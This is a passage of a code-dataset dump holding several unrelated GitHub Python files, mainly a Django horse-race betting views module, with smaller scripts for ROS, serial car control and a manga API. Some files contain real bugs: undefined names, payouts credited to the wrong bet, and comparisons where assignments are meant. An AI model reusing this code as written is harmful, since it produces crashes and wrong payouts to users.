float)\n\n\n@pipeline\ndef data_pipeline():\n commodity_data = read_commodity_data_raw()\n rainfall_data = read_rainfall_data_raw()\n processed_data = process_data(commodity_data, rainfall_data)\n data_check(processed_data)\n test_cases(processed_data)\n\n\nif __name__ == \"__main__\":\n result = execute_pipeline(data_pipeline)\n","repo_name":"sayantikabanik/FP2","sub_path":"forecasting_framework/data/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38064443087","text":"res = 0\n\n\ndef check(mid):\n cnt = 0\n here = -1\n for p in w:\n if here <= p:\n cnt += 1\n here = p+mid\n return cnt >= m\n\n\ndef bs(s, e):\n global res\n for i in range(100):\n mid = (s+e) >> 1\n if check(mid):\n s = mid+1\n res = max(res, mid)\n else:\n e = mid-1\n\n\nn, m, k = map(int, input().split())\nw = list(map(int, input().split()))\nbs(0, w[-1])\nr = ''\ncnt = 0\nhere = -1\nfor p in w:\n if here <= p and cnt < m:\n r += '1'\n here = p+res\n cnt += 1\n else:\n r += '0'\nprint(r)\n","repo_name":"shg9411/algo","sub_path":"algo_py/boj/bj1508.py","file_name":"bj1508.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"3997212407","text":"import logging\n\nfrom .common import standard_request\n\nlogger = logging.getLogger(__name__)\n\n\ndef create(manga_id, file_url, location=None, state='ready'):\n return standard_request(\n model='file',\n method='create',\n params={\n 'manga_id': manga_id,\n 'url': file_url,\n 'location': location,\n 'state': state,\n },\n logger=logger,\n )\n\n\ndef read(file_id):\n \"\"\"\n {\n \"url\": \"https://manga.madokami.al/Manga/N/NE/NEKO/Neko Musume Michikusa Nikki/Neko Musume Michikusa Nikki - v10 c58 [batoto - placeholder scanlations].zip\",\n \"location\": \"/data/raw_files/2/40_-_Neko_Musume_Michikusa_Nikki_-_v10_c58_[batoto_-_placeholder_scanlations].zip\",\n \"time_created\": \"2017-11-14T19:26:14\",\n \"ignore\": false,\n \"manga_id\": 2,\n \"downloaded\": true,\n \"id\": 40,\n \"parsed\": true,\n \"time_updated\": \"2017-11-16T22:00:59\"\n }\n \"\"\"\n return standard_request(\n model='file',\n method='read',\n params={\n 'id': file_id,\n },\n logger=logger,\n )\n\n\ndef update(file_id, manga_id=None, file_url=None, location=None, state=None):\n return standard_request(\n model='file',\n method='update',\n params={\n 'id': file_id,\n 'manga_id': manga_id,\n 'url': file_url,\n 'location': location,\n 'state': state,\n },\n logger=logger,\n )\n\n\ndef delete(file_id):\n return standard_request(\n model='file',\n method='delete',\n params={\n 'id': file_id,\n },\n logger=logger,\n )\n\n\ndef index(manga_id=None, state=None):\n return standard_request(\n model='file',\n method='index',\n params={\n 'manga_id': manga_id,\n 'state': state,\n },\n logger=logger,\n )\n","repo_name":"antonpaquin/Homulili","sub_path":"src/backend/flask_interface/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44071643491","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ('contacts', '0009_auto_20150910_2158'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='properties',\n name='group',\n field=models.ForeignKey(verbose_name='groupe', default=1, to='auth.Group', related_name='properties'),\n preserve_default=False,\n ),\n ]\n","repo_name":"vegaelle/pyru","sub_path":"contacts/migrations/0010_properties_group.py","file_name":"0010_properties_group.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24404577421","text":"import serial\nimport time\n\nser = serial.Serial(\"/dev/ttyUSB0\", 115200)\nser.flushInput()\ntime.sleep(1)\n\nstart = \"!start1590\\n\"\ninits = \"!inits0.5\\n\"\nkp = \"!kp0.01\\n\"\nkd = \"!kd0.01\\n\"\nstraight = \"!straight1500\\n\"\nser.write(start.encode())\nser.write(inits.encode())\nser.write(kp.encode())\nser.write(kd.encode())\nser.write(straight.encode())\n\n\ndef drive(value):\n command = \"!speed\" + str(value) + \"\\n\"\n ser.write(command.encode())\n\n\ndef steer(value):\n command = \"!steering\" + str(value) + \"\\n\"\n ser.write(command.encode())\n\nprint(\"right\")\nsteer(15.0)\ntime.sleep(2)\nprint(\"left\")\nsteer(-15.0)\ntime.sleep(2)\nprint(\"go\")\ndrive(1)\ntime.sleep(2)\nprint(\"stop\")\ndrive(0)\ntime.sleep(2)","repo_name":"kalinnorman/SDCars","sub_path":"class_code/driveTesting.py","file_name":"driveTesting.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10607465075","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport cv2, sys, time, math\nfrom sensor_msgs.msg import Image\n\n\nclass CrosspiontRotation():\n def __init__(self):\n self.photo = []\n self.photo = np.ndarray(self.photo)\n\n self.count_callback = 0\n self.floorcam_subscriber = rospy.Subscriber('/pi_floorcam/image_raw/compressed',\n CompressedImage, callback_floorcam)\n\n def callback_floorcam(self, _photo):\n np_arr = np.fromstring(_img.data, np.uint8)\n image_cv = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n image_cv = cv2.cvtColor(image_np, cv2.COLOR_BGR2GRAY)\n\n\nif __name__ == \"__main__\":\n try:\n rospy.init_node('hengel_crosspoint_rotation')\n CrosspiontRotation()\n except Exception as e:\n print(e)\n rospy.loginfo(\"shutdown program\")\n","repo_name":"bkjung/hengel_ros","sub_path":"hengel_navigation/scripts/crosspoint_rotation.py","file_name":"crosspoint_rotation.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35023901119","text":"from django.shortcuts import render\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.urls import reverse_lazy\nfrom django.urls import reverse\nfrom .models import JornadaH, Carrera, DetallesCarrera, ActualizarEstatusCarrerasCorriendo, ActualizarEstatusCarrerasCorriendoPendientes\nfrom .forms import (IncluirCarreraForm, IncluirJornadaForm, ActualizarJornadaForm, RegistrarDetallesForm, \n\t\t\t\t\tActualizarDetallesForm, ActualizarCarreraForm, FinalizarCarreraForm, ListaCarreraForm,\n FinalizarDetallesForm, RegistrarResultadosForm)\nfrom django.views.generic.list import ListView\nfrom flyhorse.mixin import AuthenticatedEncarMixin\nfrom datetime import datetime\nfrom pytz import timezone\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apps.apuesta.models import Apuesta, TipoApuesta, DetalleApuesta\nfrom apps.monedavirtual.models import Transaccion\nfrom apps.usuario.models import User\n\n# Create your views here.\n\"\"\"\nAPS para gestionar el cambio automático de estado de las carreras\n\"\"\"\n#Necesito garantizar de alguna manera que este código se ejecute cada vez que se encienda el server.\n#Por eso está acá afuera, sin ninguna función ni nada.\n#Ahora, como el APS no ofrece persistencia de la data, tenemos que consultar en la BD los trabajos\n#que están pendientes.\n#Se guardan en la tabla Job. Tienen estatus, fecha, hora y un ID único.\n#A partir de esto, y cada vez que se ejecuta el server, se cargan a un scheduler único todos los\n#trabajos pendientes, permitiendo añadir más si es necesario.\nscheduler = BackgroundScheduler() #Declaro el scheduler\ntz = timezone('America/Caracas') #Zona horaria porque el APS se vuelve un despelote sin eso\njobs = Carrera.objects.filter(id_jh__fecha__gte=datetime.now(tz).date(),hora__gte=datetime.now(tz).time(),estatus='a') #Consulto si hay trabajos que están pendientes en la BD\nif jobs:\n\tfor job in jobs:\n\t\tf = job.id_jh.fecha.strftime(\"%Y-%m-%d\")\n\t\th = job.hora.strftime(\"%H:%M:00\")\n\t\tfh = f + ' ' + h\n\t\tscheduler.add_job(ActualizarEstatusCarrerasCorriendo,'date', run_date=fh, timezone='America/Caracas') #Los cargo al scheduler interno\njobs = Carrera.objects.filter(id_jh__fecha__lte=datetime.now(tz).date(),hora__lte=datetime.now(tz).time(),estatus='a') #Consulto si hay trabajos \"vencidos\" en la BD\nif jobs:\n\tfor job in jobs:\n\t\tActualizarEstatusCarrerasCorriendoPendientes(job.id_jh.fecha, job.hora) #No los cargo: los actualizo de una vez\nscheduler.print_jobs() #Imprimirlos, para confirmar que todo marcha bien.\n#scheduler.start() #Inicio. Si no inicio no sirve de nada porque no habrá nadie esperando para ejecutar el método\n\n\"\"\"\nCARRERAS\n\n\"\"\"\n\nclass IncluirCarrera(AuthenticatedEncarMixin, CreateView):\n\tmodel = Carrera\n\tform_class = IncluirCarreraForm\n\ttemplate_name = \"carrera/incluirC.html\"\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('detalleC', kwargs={'pk': self.object.pk, 'modal': 'show'})\n\n#Es evidente que hay que crear el trabajo con el APS cada vez que se incluye una carrera.\n#Por eso está la sobrecarga del form_valid. Este crea el trabajo tanto en BD como en el scheduler interno.\n\tdef form_valid(self, form): \n\t\tinstance = form.save(commit=False)\n\t\tfecha = form.cleaned_data['id_jh'].fecha\n\t\tfecha = fecha.strftime(\"%Y-%m-%d\")\n\t\thora = form.cleaned_data['hora'].strftime(\"%H:%M:00\")\n\t\tfh = fecha + ' ' + hora\n\t\tprint(fh)\n\t\ttrabajo = Job()\n\t\ttrabajo.fecha = fecha\n\t\ttrabajo.hora = hora\n\t\ttrabajo.save()\n\t\tscheduler.add_job(ActualizarEstatusCarrerasCorriendo,'date', run_date=fh, timezone='America/Caracas')\n\t\tscheduler.print_jobs()\n\t\treturn super().form_valid(form)\t\n\t\t\n\nclass ListaCarrera(AuthenticatedEncarMixin, ListView):\n\tmodel = Carrera\n\ttemplate_name = \"carrera/listaCr.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\test = self.kwargs.get('estatus')\n\t\tcontext = super(ListaCarrera, self).get_context_data(**kwargs)\n\t\tcontext[\"object_list\"] = Carrera.objects.filter(id_jh__estatus='a')\n\t\treturn context\n\nclass ActualizarCarrera(AuthenticatedEncarMixin, UpdateView):\n\tmodel = Carrera\n\tform_class = ActualizarCarreraForm\n\ttemplate_name = \"carrera/actualizarC.html\"\n\tsuccess_url = reverse_lazy('listaCr')\n\nclass FinalizarCarrera(AuthenticatedEncarMixin, UpdateView):\n\tmodel = Carrera\n\tform_class = FinalizarCarreraForm\n\ttemplate_name = \"carrera/finalizarC.html\"\n\tsuccess_url = reverse_lazy('listaCr')\n\nclass EliminarCarrera(AuthenticatedEncarMixin, UpdateView):\n\tmodel = Carrera\n\tform_class = FinalizarCarreraForm\n\ttemplate_name = \"carrera/eliminarC.html\"\n\tsuccess_url = reverse_lazy('listaCr')\n\n\"\"\"\nJORNADA\n\"\"\"\n\nclass IncluirJornada(AuthenticatedEncarMixin, CreateView):\n\tmodel = JornadaH\n\tform_class = IncluirJornadaForm\n\ttemplate_name = \"jornada/incluirJ.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(IncluirJornada, self).get_context_data(**kwargs)\n\t\tcontext['show'] = self.kwargs.get('modal')\n\t\treturn context\t\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('incluirJh', kwargs={'modal': 'show'})\n\nclass ListaJornada(AuthenticatedEncarMixin, ListView):\n\tmodel = JornadaH\n\ttemplate_name = \"jornada/listaJ.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(ListaJornada, self).get_context_data(**kwargs)\n\t\tcontext['jornadas'] = JornadaH.objects.filter(estatus='a')\n\t\tcontext['show'] = self.kwargs.get('modal')\n\t\treturn context\t\n\nclass ActualizarJornada(AuthenticatedEncarMixin, UpdateView):\n\tmodel = JornadaH\n\tform_class = ActualizarJornadaForm\n\ttemplate_name = \"jornada/actualizarJ.html\"\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('consJh', kwargs={'pk': self.object.id ,'modal': 'show'})\n\n\n\nclass EliminarJornada(AuthenticatedEncarMixin, DeleteView):\n\tmodel = JornadaH\n\ttemplate_name = \"jornada/eliminarJ.html\"\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('listaJh', kwargs={'modal': 'show'})\n\nclass ConsultarJornada(AuthenticatedEncarMixin, ListView):\n\tmodel = JornadaH\n\tsecond_model = Carrera\n\ttemplate_name = \"jornada/consultarJ.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(ConsultarJornada, self).get_context_data(**kwargs)\n\t\tcontext['carreras'] = Carrera.objects.filter(id_jh = pk)\n\t\tcontext['jornadah'] = JornadaH.objects.get(id = pk)\n\t\tcontext['show'] = self.kwargs.get('modal')\n\t\treturn context\t\t\n\n\n\"\"\"\nDETALLES\n\"\"\"\nclass ListaDetallesC(AuthenticatedEncarMixin, ListView):\n\tmodel = DetallesCarrera\n\tsecond_model = Carrera\n\ttemplate_name = \"carrera/listdetallesC.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(ListaDetallesC, self).get_context_data(**kwargs)\n\t\tcontext['competidores'] = DetallesCarrera.objects.filter(id_carr=pk).order_by('numero', '-estatus')\n\t\tcontext['carrera'] = Carrera.objects.get(id=pk)\n\t\tcontext['show'] = self.kwargs.get('modal')\n\t\treturn context\n\t\n\t\t\nclass RegistrarDetalles(AuthenticatedEncarMixin, CreateView):\n\tmodel = DetallesCarrera\n\tsecond_model = Carrera\n\tform_class = RegistrarDetallesForm\n\ttemplate_name = \"carrera/incluirD.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(RegistrarDetalles, self).get_context_data(**kwargs)\n\t\tcontext['carrera'] = Carrera.objects.get(id=pk)\n\t\treturn context\n\n\tdef get_success_url(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\treturn reverse_lazy('detalleC', kwargs={'pk': pk,'modal':'show'})\n\nclass ActualizarDetalle(AuthenticatedEncarMixin, UpdateView):\n\tmodel = DetallesCarrera\n\tform_class = ActualizarDetallesForm\n\ttemplate_name = 'carrera/actualizarD.html'\n\t\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('detalleC', kwargs={'pk': self.object.id_carr.id,'modal':'show' })\n\nclass RetirarCompetidor(AuthenticatedEncarMixin, UpdateView):\n\tmodel = DetallesCarrera\n\tform_class = FinalizarDetallesForm\n\ttemplate_name = 'carrera/eliminarD.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super().get_context_data(**kwargs)\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext['DetallesCarrera'] = DetallesCarrera.objects.get(id=pk)\n\t\treturn context\n\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('detalleC', kwargs={'pk': self.object.id_carr.id, 'modal':'show'})\n\n\tdef form_valid(self, form): \n\t\tinstance = form.save(commit=False)\n\t\tid_carr = instance.id_carr_id\n\t\tapuestas = Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=1) | Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=2) |Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=3) |Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=4) |Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=5) |Apuesta.objects.filter(id_carr_id=id_carr,tApuesta_id=6)\n\t\tfor apuesta in apuestas:\n\t\t\tdetalle_apuesta = DetalleApuesta.objects.filter(id_ap_id=apuesta.id,id_cab_id=instance.id_caba_id)\n\t\t\tfor da in detalle_apuesta:\n\t\t\t\tprint(da)\n\t\t\t\tapuesta.estatus='D'\n\t\t\t\tapuesta.save()\n\t\t\t\tt = Transaccion() ##Crea una transacción...\n\t\t\t\tusuario = User.objects.get(id=apuesta.usuario_id) ##Necesito el usuario que ganó, obviamente\n\t\t\t\tusuario.incrementarSaldo(apuesta.idTrans.monto, usuario.username) ##Incrementa el saldo por devolución\n\t\t\t\tt.usua = usuario ##Le asignas el usuario a la transacción\n\t\t\t\tt.fecha = datetime.now() ##La fecha del reparto\n\t\t\t\tt.monto = apuesta.idTrans.monto ##Cuánto ganó\n\t\t\t\tt.tipo = 'c' ##Crédito\n\t\t\t\tt.estado = 'c' ##Operación completada\n\t\t\t\tt.descripcion = 5 ##\"Devolución de Apuesta\"\n\t\t\t\tt.ref = \"-\" ##Referencia\n\t\t\t\tt.save() ##Guarda la transacción en la BD\n\t\treturn super().form_valid(form) \n\nclass ListaDetallesCarrJ(AuthenticatedEncarMixin, ListView):\n\tmodel = DetallesCarrera\n\tsecond_model = Carrera\n\ttemplate_name = \"carrera/listaDetCarr.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(ListaDetallesCarrJ, self).get_context_data(**kwargs)\n\t\tcontext['competidores'] = DetallesCarrera.objects.filter(id_carr=pk).order_by('posicion')\n\t\tcontext['carrera'] = Carrera.objects.get(id=pk)\n\t\treturn context\n\nclass RegistrarResultados(AuthenticatedEncarMixin, UpdateView):\n\tmodel = DetallesCarrera\n\tform_class = RegistrarResultadosForm\n\ttemplate_name = 'carrera/registrarR.html'\n\t\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('detalleCJ', kwargs={'pk': self.object.id_carr.id })\n\n\tdef form_valid(self, form):\n\t\tinstance = form.save(commit=False)\n\t\tpk = self.kwargs.get('pk')\n\t\tdt = DetallesCarrera.objects.get(id=pk).id_carr.id\n\t\tvalidacionpublicar = DetallesCarrera.objects.extra(select={ \n\t\t\t'esperado': \"count(id)\",\n\t\t\t'guardado': \"count(posicion)\",\n\t\t}, where={\n\t\t\t\"estatus = 'a'\",\n\t\t\t\"id_carr_id=%s\"\n\t\t}, params={dt})\n\t\tfor vp in validacionpublicar:\n\t\t\tif vp.esperado == vp.guardado:\n\t\t\t\tc = Carrera.objects.get(id=dt)\n\t\t\t\tc.publicable = True\n\t\t\t\tc.save()\n\t\t\telse:\n\t\t\t\tc = Carrera.objects.get(id=dt)\n\t\t\t\tc.publicable = False\n\t\t\t\tc.save()\n\t\treturn super().form_valid(form)\n\t\nclass listadoCarreras(ListView):\n\tmodel = Carrera\n\ttemplate_name = \"apuesta/listadoCarreras.html\"\n\t\n\tdef get_context_data(self, **kwargs):\n\t\test = self.kwargs.get('estatus')\n\t\tcontext = super(listadoCarreras, self).get_context_data(**kwargs)\n\t\tcontext[\"object_list\"] = Carrera.objects.filter(id_jh__estatus='a')\n\t\treturn context\n\nclass ConsultarC(DetailView):\n\tmodel = Carrera\n\ttemplate_name = \"carrera/ConsultarC.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tpk = self.kwargs.get('pk')\n\t\tcontext = super(ConsultarC, self).get_context_data(**kwargs)\n\t\tcontext['object_list'] = DetallesCarrera.objects.filter(id_carr_id=pk).order_by('posicion', 'numero')\n\t\treturn context\n\ndef RegistrarApuestaGanada(usuario, apuesta, mult=1, monto=0):\n\tt = Transaccion() ##Crea una transacción...\n\tif monto==0:\n\t\tusuario.incrementarSaldo(apuesta.idTrans.monto*apuesta.cuota*mult, usuario.username) ##¡Incrementa el saldo, ganó!\n\telse:\n\t\tusuario.incrementarSaldo(monto, usuario.username) ##¡Incrementa el saldo, ganó!\n\tt.usua = usuario ##Le asignas el usuario a la transacción\n\tt.fecha = datetime.now() ##La fecha del reparto\n\tif monto==0:\n\t\tt.monto = apuesta.idTrans.monto*apuesta.cuota*mult ##Cuánto ganó\n\telse:\n\t\tt.monto = monto\n\tt.tipo = 'c' ##Crédito\n\tt.estado = 'c' ##Operación completada\n\tt.descripcion = 4 ##\"Apuesta ganada\"\n\tt.ref = \"-\" ##Referencia\n\tt.save() ##Guarda la transacción en la BD\n\tapuesta.estatus = 'G'\n\tapuesta.idTransGanada = t\n\tapuesta.save() ##¡La apuesta ganó!\n\ndef RegistrarApuestaPerdida(apuesta):\n\tapuesta.estatus = 'P' \n\tapuesta.save() ##La apuesta perdió :(\n\t\nclass PublicarResultados(AuthenticatedEncarMixin, UpdateView):\n\tmodel = Carrera\n\tform_class = FinalizarCarreraForm\n\ttemplate_name = 'carrera/publicarC.html'\n\tdef get_success_url(self):\n\t\treturn reverse_lazy('listaCr')\n\n\tdef form_valid(self, form): ###Una vez publicados los resultados, es hora de... ¡Escrutinios!\n\t###Por la forma en que lo planteo, realiza escrutinios Y reparte premios al mismo tiempo.\n\t###Hace un escrutinio por cada tipo de apuesta, buscando a los ganadores.\n\t###Comencemos\n\t\tinstance = form.save(commit=False)\n\t\tid_carrera = instance.id ###¿Sobre cuál carrera trabajamos?\n\t\tcaballos = DetallesCarrera.objects.filter(id_carr_id=id_carrera).exclude(posicion=500).order_by('posicion') ###¿Cuáles son los caballos en cuestión? Ordenados por llegada.\n\t\tcaballo_primero = caballos[:1].get().id_caba ###El primer caballo...\n\t\tcaballo_segundo = caballos[1:2].get().id_caba ###El segundo caballo...\n\t\tcaballo_tercero = caballos[2:3].get().id_caba ###El tercer caballo...\n\t\tcaballo_cuarto = caballos[3:4].get().id_caba ###El cuarto caballo...\n\n\t\tapostadores = Apuesta.objects.filter(id_carr_id=id_carrera, estatus='A') ###Vamos a buscar a todos los que apostaron en esta carrera en específico.\n\t\t\n\t\t###APUESTAS TIPO: UNICARRERA\n\t\t###Para las apuestas uni carrera.\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 1: Ganador\n\t\t###En Ganador, se apuesta sólo a un caballo que resulte ganador de una carrera específica.\n\n\t\tapostadores_apGanador = apostadores.filter(tApuesta_id=1) ###...y a estos, los filtramos por los que apostaron a Ganador\n\t\tfor ag in apostadores_apGanador: ###tráete el detalle de la apuesta de todos los apostadores en cuestión\n\t\t\t###Como es apuesta ganador, sólo se trae un objeto (get)\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.get(id_ap_id=ag.id)\n\t\t\tif detalles_apuesta.id_cab == caballo_primero: ##Si el caballo del primer lugar es el mismo caballo al que apostaste, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ag.usuario_id),ag)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(ag)\n\t\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 2: Exacta\n\t\t###En el caso de exacta, se trata de de que los dos caballos elegidos terminen en 1ra y 2da posición.\n\n\t\tapostadores_apExacta = apostadores.filter(tApuesta_id = 2) ##Tipo de Apuesta Exacta\n\n\t\tfor ae in apostadores_apExacta:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=ae.id).order_by('posicion') ##Extraigo todos los detalle apuesta de esa apuesta. Ordeno por posicion.\n\t\t\tif detalles_apuesta[:1].get().id_cab == caballo_primero and detalles_apuesta[1:2].get().id_cab == caballo_segundo: ##Si pegó ambas, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ae.usuario_id),ag)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(ae)\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 3: Trifecta\n\t\t###Acertar el primer, segundo y tercer lugar exactos.\n\n\t\tapostadores_apTrifecta = apostadores.filter(tApuesta_id = 3) ##Tipo de Apuesta Trifecta\n\n\t\tfor at in apostadores_apTrifecta:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=at.id).order_by('posicion') ##Extraigo todos los detalle apuesta de esa apuesta. Ordeno por posicion.\n\t\t\tif detalles_apuesta[:1].get().id_cab == caballo_primero and detalles_apuesta[1:2].get().id_cab == caballo_segundo and detalles_apuesta[2:3].get().id_cab == caballo_tercero: ##Si pegó las tres, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=at.usuario_id),ag)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(at)\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 4: Superfecta\n\t\t###Acertar los primeros 4 lugares exactos.\n\n\t\tapostadores_apSuperfecta = apostadores.filter(tApuesta_id = 4) ##Tipo de Apuesta Trifecta\n\n\t\tfor aS in apostadores_apSuperfecta:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=aS.id).order_by('posicion') ##Extraigo todos los detalle apuesta de esa apuesta. Ordeno por posicion.\n\t\t\tif detalles_apuesta[:1].get().id_cab == caballo_primero and detalles_apuesta[1:2].get().id_cab == caballo_segundo and detalles_apuesta[2:3].get().id_cab == caballo_tercero and detalles_apuesta[3:4].get().id_cab == caballo_cuarto: ##Si pegó las cuatro, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=aS.usuario_id),aS)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(aS)\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 5: Place\n\t\t###Acertar el primer o segundo lugar\n\n\t\tapostadores_apPlace = apostadores.filter(tApuesta_id = 5) ##Tipo de Apuesta Place\n\n\t\tfor al in apostadores_apPlace:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.get(id_ap_id=al.id)##Sólo elegí un caballo.\n\t\t\tif detalles_apuesta.id_cab == caballo_primero or detalles_apuesta.id_cab == caballo_segundo: ##Si pegó que llegó primero o segundo las cuatro, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=al.usuario_id),al)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(al)\n\n\t\t###REPARTICIÓN DE PREMIOS - TIPO DE APUESTA 6: Show\n\t\t###Acertar el primer, segundo lugar o tercer lugar\n\n\t\tapostadores_apShow = apostadores.filter(tApuesta_id = 6) ##Tipo de Apuesta Place\n\n\t\tfor ah in apostadores_apShow:\n\t\t\tdetalles_apuesta = DetalleApuesta.objects.get(id_ap_id=ah.id)##Sólo elegí un caballo.\n\t\t\tif detalles_apuesta.id_cab == caballo_primero or detalles_apuesta.id_cab == caballo_segundo or detalles_apuesta.id_cab == caballo_tercero: ##Si pegó que llegó primero o segundo las cuatro, entonces...\n\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ah.usuario_id),ah)\n\t\t\telse:\n\t\t\t\tRegistrarApuestaPerdida(ah)\n\n\t\t###MULTICARRERAS\n\t\t###5y6, PollaMax. Lo primero es saber si la carrera pertenece a alguno de estos tipos de apuesta.\n\n\t\tjornada = JornadaH.objects.get(id=instance.id_jh_id) ##Necesito traerme la jornada hípica.\n\t\tcarreras_jornada = Carrera.objects.filter(id_jh=jornada).order_by('-hora') ##Todas las carreras de la jornada, ordenadas de la última a la primera.\n\t\tcarreras_5y6 = carreras_jornada[:6] ##Tengo las últimas 6 carreras de la jornada, las que aplican a 5y6 y pollamax juntas.\n\t\tcarrera_polla = carreras_jornada[6:7].get() ##Tengo la 7ma última carrera de la jornada, que aplican a pollamax\n\t\tultima_carrera = carreras_jornada[:1].get() ##Tengo la última carrera de la jornada, para repartir premios tanto de pollamax como de 5y6\n\n\t\tapostadores_ap5y6 = apostadores.filter(tApuesta_id=7) ##Tipo de apuesta 5y6\n\t\tapostadores_pollamax = apostadores.filter(tApuesta_id=8) ##Tipo de apuesta Polla Max\n\n\t\tfor carrera in carreras_5y6:\n\t\t\tif carrera == instance: ##¿La carrera está en 5y6? Entonces reparte premios de 5y6 y pollamax.\n\t\t\t\tfor a5 in apostadores_ap5y6: ##Recorro cada una de las apuestas que hay de 5y6\n\t\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.get(id_ap_id=a5.id) ##Me traigo todos los detalle_apuesta que puede tener\n\t\t\t\t\tfor da in detalles_apuesta: ##Recorro todos los detalle_apuesta\n\t\t\t\t\t\tif da.id_cab == caballo_primero: ##¿El caballo del detalle_apuesta es el ganador?\n\t\t\t\t\t\t\tda.posicion = 100 ##En efecto, el detalle_apuesta resultó ganador. Después contaré la cantidad que resultó.\n\t\t\t\t\t\t\tda.save()\n\n\t\t\t\tfor am in apostadores_pollamax: ##Recorro cada una de las apuestas que hay de polla max\n\t\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.get(id_ap_id=am.id) ##Me traigo todos los detalles\n\t\t\t\t\tfor da in detalles_apuesta: ##Recorro todos los detalle_apuesta\n\t\t\t\t\t\tif da.id_cab == caballo_primero: ##El caballo ganó.\n\t\t\t\t\t\t\tda.monto = 5 ##Le asigno 5 pts\n\t\t\t\t\t\t\tda.save()\n\t\t\t\t\t\telif da.id_cab == caballo_segundo: ##El segundo lugar.\n\t\t\t\t\t\t\tda.monto == 2 ##Le asigno 2 pts\n\t\t\t\t\t\t\tda.save()\n\t\t\t\t\t\telif da.id_cab == caballo_tercero: ##El tercer lugar\n\t\t\t\t\t\t\tda.monto == 1 ##Le asigno 1 pt\n\t\t\t\t\t\t\tda.save()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tda.monto == 0 ##No tuvo puntos\n\t\t\t\t\t\t\tda.save()\n\n\t\tif instance==carrera_polla: ##Si la carrera es la 7ma última (PollaMax)\n\t\t\tfor am in apostadores_pollamax: ##Recorro cada una de las apuestas que hay de polla max\n\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.get(id_ap_id=am.id) ##Me traigo todos los detalles\n\t\t\t\tfor da in detalles_apuesta: ##Recorro todos los detalle_apuesta\n\t\t\t\t\tif da.id_cab == caballo_primero: ##El caballo ganó.\n\t\t\t\t\t\tda.monto = 5 ##Le asigno 5 